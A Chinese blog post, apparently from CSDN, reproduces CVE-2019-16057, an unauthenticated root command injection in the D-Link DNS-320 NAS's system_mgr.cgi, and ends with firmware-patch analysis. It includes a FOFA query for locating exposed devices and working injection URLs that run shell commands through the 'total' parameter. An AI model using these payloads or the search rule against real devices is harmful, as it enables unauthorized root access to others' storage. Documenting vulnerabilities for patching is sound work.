D-Link ShareCenter DNS-320 system_mgr.cgi 远程命令执行漏洞复现(CVE-2019-16057)

已于 2024-01-24 13:10:22 修改
阅读量535 收藏 10
点赞数 11
分类专栏: 漏洞复现篇 文章标签: 安全
于 2024-01-24 11:47:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42181573/article/details/135816018
版权

漏洞描述

D-Link ShareCenter DNS-320是一款NAS网络存储。
CVE-2019-16057漏洞的触发无需认证,通过利用该漏洞,未经身份验证的远程攻击者可以凭root权限运行任何系统命令。

影响版本

适用于 2.05.B10及以下的版本。

漏洞分析

参考文献:

1. https://xz.aliyun.com/t/7083?time__1311=n4%2BxnD0GDti%3D0%3DNitdDsA3ghD9n%3DeDRYc7nYD&alichlgref=https%3A%2F%2Fwww.baidu.com%2Flink%3Furl%3DRvhxYerLfXFLq7iO3wu_2L9-wu6Fh5ujFXxNmtZJ_awZkQzuew7dp2QK9mFnPNlU%26wd%3D%26eqid%3Db9d22e02008d24d70000000365b077c4
2. https://nosec.org/home/detail/2986.html

环境搭建

FOFA规则:body=“ShareCenter” && product=“D_Link-DNS-ShareCenter” && port=“80”
在这里插入图片描述

漏洞复现

执行payload:

1. /cgi-bin/system_mgr.cgi?cmd=cgi_get_log_item&total=;ls;
2. /cgi-bin/system_mgr.cgi?cmd=cgi_get_log_item&total=;df;
3. /cgi-bin/system_mgr.cgi?cmd=cgi_get_log_item&total=;pwd;

在这里插入图片描述
在这里插入图片描述

修复建议

获得修复版本固件:

$ wget ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DNS-320/REVA/DNS-320_REVA_FIRMWARE_v2.06B01.zip
$ unzip DNS-320_REVA_FIRMWARE_v2.06B01.zip

固件解压:

$ binwalk -e DLINK_DNS320.2.06b01\(2.13.0322.2019\)

使用IDA打开login_mgr.cgi文件:
在这里插入图片描述
可以看到在修复版本中通过类型转换将参数port的值固定为Integer,规避了特殊字符,因而避免了注入的可能。

Li-D
关注
  • 11
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
D-LINK_ShareCenterSync_v2.0.0.9
02-26
D-Link DNS-320L 驱动程序是微型程序,能够让您的 网络存储 硬件与操作系统软件进行通讯。维持最新的 D-Link DNS-320L 软件能够防止崩溃,并充分利用硬件与系统性能。使用陈旧或损坏的 D-Link DNS-320L 驱动程序会导致系统故障、崩溃,并让您的计算机或硬件出故障。此外,安装错误的 D-Link 驱动程序会让这些问题更严重。
D-link des-3828三层交换机入门设置
清风弄影
10-27 5715
        买了台dlink的des-3828三层交换,一看说明书,头有点大了,全部e文。因为必须要用三层功能,而且dlink的中文资料还挺难找的,所以咬牙看懂了大部分。基本上和其他设置差不多,只是语法有点差异。基本上了解下面这几点,你的三层交换机就可以工作了。        下面的设置是使用超级终端连接到设备进行的。1.设置三层交换机的地址config ipif System add
thinkphp漏洞_雷神众测漏洞周报 2020.5.182020.5.244
weixin_39725154的博客
12-01 226
No.1声明以下预警内容,均摘自于互联网,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,雷神众测以及文章作者不承担任何责任。雷神众测拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明雷神众测允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。No.2目录1.Apache Tomcat ...
NAS系统 选购必备特性
weixin_33991418的博客
11-25 161
NAS系统 选购必备特性 (发布时间:2012-06-14-09:06:02) 近几年,NAS在企业领域的应用十分广泛,从大型企业到微型企业,都可以看到它的身影。非结构化数据正在以指数级的速度飞快增长,这种环境背后直接导致了文件存储需求的激增以及NAS市场的爆发性增长。 根据一份来自ESG(Enterprise Strategy Group)的统计报告,...
dns 320l php,D-Link DNS-320L ShareCenter Backdoor Account / Remote Root
weixin_36250220的博客
04-06 481
###########################################################################______ ____________ __/ ____/_ __/ / __/_ __/__ _____/ /_/ / __/ / / / / /_ / / / _ \/ ___/ __ \/ /_/ / /_/...
D-Link service.cgi远程命令执行漏洞
weixin_30561425的博客
01-25 266
1.1 概述 友讯集团(D-Link),成立于1986年,1994年10月于台湾证券交易所挂牌上市,为台湾第一家上市的网络公司,以自创D-Link品牌行销全球,产品遍及100多个国家。 1月17日,CNVD公开了D-LinkDIR 615/645/815 service.cgi远程命令执行漏洞(CNVD-2018-01084)。由于笔者近期对网络设备进行渗透技术略有研究,便了一下该漏洞。 ...
D-Link NAS 未授权RCE漏洞(CVE-2024-3273)
0xSec
04-09 728
D-Link NAS nas_sharing.cgi接口存在命令执行漏洞,该漏洞存在于“/cgi-bin/nas_sharing.cgi”脚本中,影响其 HTTP GET 请求处理程序组件。漏洞成因是通过硬编码帐户(用户名:“messagebus”和空密码)造成的后门以及通过“system”参数的命令注入问题。未经身份验证的攻击者可利用此漏洞获取服务器权限。
漏洞D-Link nas_sharing.cgi 远程代码执行漏洞(CVE-2024-3273)
qq_67810151的博客
04-09 208
D-Link DNS-320L存在命令注入漏洞,未授权的攻击者可以通过该漏洞进行远程代码执行,从而控制服务器。
DNS-320L 320中文设置说明
07-26
DNS-320L 如何使用中文接口 DNS-320 默认为英文接口,可以透过以下的范例更改为中文接口 请先下载中文化更新档案点我下载 1.在网址内输入「http://设备的IP地址」(分享器DHCP用户列表查询) 或「http://dlink-设备...
eMaxim_link_tool.exe
06-26
1. 双击打开eMaxim_link_tool 2. 插入接收器点击等待Status:显示Device detected. 3. 点击按钮或空格键进入对码,LED将会闪烁20秒,此时按鼠标或键盘对码键可进行配对,配对成功LED熄灭
ShareCenter:使用第三方开放RESTAPI实的分享库
05-08
ILSSCShareCenter 需求 Mercury移动浏览器有一个分享内容到第三方平台的功能,第三方平台的数量有十几个。有的方案是将每个平台自家或第三方发布的SDK集成到项目中来实。带来的问题是App体积包增大,代码的可控...
ShareCenter(iPhone源代码)
03-17
来源:github/ShareCenterExampLicence:MIT平台:iOS设备:iPhone / iPad作者:邓宇光  新浪微博, 腾讯微博,人人网登录认证Demo。...如果测试时发登录不了,那有可能是key过期了,得自己重新申请。...
漏洞D-Link NAS设备nas_sharing.cgi接口存在远程命令执行漏洞CVE-2024-3273
最新发布
失心少年
04-18 60
D-Link DNS-320是中国友讯(D-Link)公司的一款NAS(网络附属存储)设备。D-Link DNS-320L存在命令注入漏洞,该漏洞源于文件/cgi-bin/nas_sharing.cgi存在命令注入漏洞。受影响的产品和版本:D-Link DNS-320L,DNS-325,DNS-327,DNS-340L,D-Link NAS Storage。受影响的产品和版本:D-Link DNS-320L,DNS-325,DNS-327,DNS-340L,D-Link NAS Storage。
PHP文件包含漏洞(利用phpinfo)
Li-D的博客
12-31 8349
漏洞描述 文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 PHP中引发文件包含漏洞的通常是以下四个函数: 1、include()当使用该函数包含文件时,只有代码执行到include()函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。 2、include_once()功能和include()相同,区别在于当重调用同一文件时,程序只调用一次。 3、require()只要程序一执行
Tomcat代码执行漏洞(CVE-2017-12615)
Li-D的博客
08-30 7178
漏洞描述 2017年9月19日,Apache Tomcat官方确认并修了两个高危漏洞漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。 影响版
Weblogic Console远程代码执行漏洞(CVE-2020-14882)
Li-D的博客
06-04 6157
漏洞描述 2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882。远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。 影响版本 Oracle WeblogicServer 10.3.6.0.0 Oracle WeblogicServer 12.1.3.0
Tomcat 幽灵猫任意文件读取漏洞(CVE-2020-1938)
Li-D的博客
09-16 3344
漏洞描述 Tomcat服务器是一个免费的开放源代码的Web应用服务器,属于轻量级应用服务器。Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。 漏洞影响版本 Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0.31 漏洞危害 攻击者可利用该漏洞进行任意文
d-linksharecenter dns-320安装向导
01-19
D-LinkShareCenter DNS-320是一个用于存储和共享文件的网络存储设备。安装向导是帮助用户顺利设置并使用这个设备的工具。首先,您需要确保已经购买了DNS-320设备,并且在打开包装之前仔细阅读了用户手册。接下来,您需要将设备连接到电源,并使用附带的网线将其连接到您的路由器或交换机上。一旦设备连接好电源和网络,您可以使用附带的安装光盘或通过D-Link的官方网站下载安装向导程序。 安装向导会引导您完成设备的初始化设置,包括设置管理员密码、设备名称和网络连接设置等。您需要确保在设置过程中选择正确的时间区域和语言设置,以确保设备运行正常。在网络连接设置中,您可以选择动态IP或静态IP,并设置设备的本地IP地址。安装向导还会提供设置文件共享权限和创建用户账号的选项,以确保您的文件得到适当的保护。 安装向导完成后,您可以通过D-Link提供的Web界面或者通过安装在计算机上的ShareCenter工具来管理和访问设备。您可以创建文件夹、上传文件、设置存储配额、以及访问设备的高级设置和状态信息。通过安装向导和设备管理界面,您可以方便地管理和控制ShareCenter DNS-320,确保您的文件得到安全而有效的存储和共享。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值